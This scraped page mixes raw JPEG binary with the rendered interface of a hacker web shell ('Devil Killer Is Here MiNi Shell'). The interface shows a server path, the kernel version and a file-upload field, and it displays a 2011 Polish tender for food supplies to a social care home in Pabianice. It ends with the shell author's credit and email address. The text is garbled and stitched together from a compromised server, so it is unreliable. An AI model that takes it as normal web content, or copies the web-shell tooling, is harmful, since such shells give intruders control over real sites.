JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111102/285885-N-2011.html

<p class="kh_header"><b>Pabianice: Dostawa artykułów spożywczych dla Domu Pomocy Społecznej w Pabianicach ul. Wiejska 55/61 w okresie od 01.04.2011r do 31.12.2011r</b><br>
<b>Numer ogłoszenia: 285885 - 2011; data zamieszczenia: 02.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Pabianicach , ul. Wiejska 55/61, 95-200 Pabianice, woj. łódzkie, tel. 042 2137551, faks 042 2137640.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pabianice-dps.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych dla Domu Pomocy Społecznej w Pabianicach ul. Wiejska 55/61 w okresie od 01.04.2011r do 31.12.2011r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów spożywczych dla Domu Pomocy Społecznej w Pabianicach ul. Wiejska 55/61 w okresie od 01.04.2011r do 31.12.2011r 

1.	Barszcz czerwony koncentrat 320g	       
         60 szt	

2.	Chrzan z kwaskiem cytrynowym 290g	         
         70 szt	

3.	Ćwikła z kwaskiem cytrynowym  290g	         
         70 szt	

4.	
Dżem wiśniowy 280g      	     
     1300 szt  	

5.	
Dżem b/c 195g	     
     2000 szt	

6.	Fasola Jaś paczkowana 500g	     
       100 kg	

7.	Fasola konserwowa 460g	     
       200 szt	

8.	Groszek konserwowy 400g	     
       800 szt 	

9	Groch suchy łupany   paczkowany 400g	     
         90 kg	

10.	Koncentrat  pomidorowy 30% 970g	     
       300 szt	

11.	Koncentrat pomidorowy 30% 200g	     
       200 szt	

12.	Kompot wiśniowy 900g	    
     2000 szt	

13.	Ogórki konserwowe 900g	    
     1000 szt	

14.	Kukurydza konserwowa 400g 	    
       200 szt	

15.	Przecier szczawiowy 320g	    
       200 szt	

16.	Sok malinowy Paola lub równoważny 700g	    
       400 szt	

17.	Cukier paczkowany 1kg	    
    4 500 kg	

18.	
Cukier puder 400g	    
       100 szt	

19.	
Cukier waniliowy 32g	    
       300 szt	

20.	
Sól paczkowana 1kg	    
       850 kg	

21.	Mięta ekspresowa     20 szt	    
       100 szt	

22.	Herbata  granulowana 100g	    
       150 kg	

23.	Kawa typu Inka lub równoważna  150g	    
       150 szt	

24.	Kakao typu Wedel lub równoważne 100g	    
       200 szt	

25.	
Liść laurowy 8g	    
       200 szt	

26.	
Majeranek 20g	    
       200 szt	

27.	
Pieprz naturalny 20g	    
       600 szt	

28.	Żelatyna typu Winiary lub równoważna 50g	    
       150 szt	

29.	
Cynamon 20g	    
       200 szt	

30.	Przyprawa typu
Warzywko 75g 	    
       400 szt	

31.	Proszek do pieczenia 32g 	    
       350 szt	

32.	Papryka konserwowa  670g	    
       400 szt	

33.	Zupa pieczarkowa w proszku 60g	    
     1000 szt	


34.	Zupa grochowa w proszku 45g	    
       120 szt	

35.	
Aromat 10g	     
       300 szt	

36.	Budyń śmietankowy 41g	    
     6000 szt	

37.	
Kisiel wiśniowy 40g	    
     6000 szt	

38.	
Słodzik 100 tabletek	    
       450 szt	

39.	Rosołki typu  knorr lub równoważne  60g	    
       500 szt	

40.	
Ocet 500g	    
         50 szt	

41.	
Przyprawa w płynie 1l	    
         80 szt	

42.	Musztarda delikatesowa 190g	    
       400 szt	

43.	Kwasek cytrynowy 30g	    
       600 szt	

44.	Majonez  typu Motyl lub równoważny 265g	    
       500 szt	

45.	
Ziele angielskie 15	    
       150 szt	

46.	Makaron paczkowany         lubella  lub równoważny 500g                                                   	   
     1400 kg	

47.	Papryka słodka w proszku  20g	   
         60 szt	

48.	Masło roślinne kostka  lub równoważne 250g	   
       800 kg	

49.	
Keczup  łagodny 500g	
       200 szt	

50.	
Ryż paczkowany 1kg	  
     1000 kg	

51.	Mąka ziemniaczana
paczkowana 1kg	  
       200 kg


52.	Mąka poznańska paczkowana 1kg	    
     3200 kg	

53.	Kasza gryczana paczkowana 500g	    
       300 kg	

54.	Kasza manna paczkowana 1kg	    
       300 kg	

55.	Kaszka  typu Ovita lub równoważna 230g  	    
         60 szt	

56.	Kasza jęczmienna paczkowana 1kg 	    
       400 kg	

57.	Płatki owsiane paczkowane 500g	    
       100 kg	

58.	
Olej uniwersalny 1l	    
       500 szt	

59.	
Olej uniwersalny 0,50l	    
         60 szt	

60.	
Miód 25g	    
     8000 szt	

61.	
Kleik ryżowy 170g	    
         50 szt	

62.	
Suchary 290g	         
         50 szt	

63.	Chrupki kukurydziane
300g	
50 szt	

64.	
Ciastka bez cukru 32g	
       800 szt	

65.	
Biszkopty 225g	
1000 szt	

66.	Smalec paczkowany 200g	
200 kg	

67.	
Grzyby suszone	
3 kg	

68.	
Jabłka suszone	
12 kg	

69.	
Śliwki suszone	
12 kg	

70.	Galaretka truskawkowa 75g	
600 szt	

71.	Brzoskwinie w puszce
850g	
50 szt.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.85.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie przewiduje się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie podpisanie oświadczenia 
stanowiącego załącznik nr 2 do specyfikacji i załączenie go do oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie podpisanie oświadczenia 
stanowiącego załącznik nr 2 do specyfikacji i załączenie go do oferty</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie podpisanie oświadczenia 
stanowiącego załącznik nr 2 do specyfikacji i załączenie go do oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie podpisanie oświadczenia 
stanowiącego załącznik nr 2 do specyfikacji i załączenie go do oferty</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie podpisanie oświadczenia 
stanowiącego załącznik nr 2 do specyfikacji i załączenie go do oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pabianice-dps.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej  95-200 Pabianice ul. Wiejska 55/61.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2011 godzina 09:00, miejsce: Dom Pomocy Społecznej  95-200 Pabianice ul. Wiejska 55/61 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com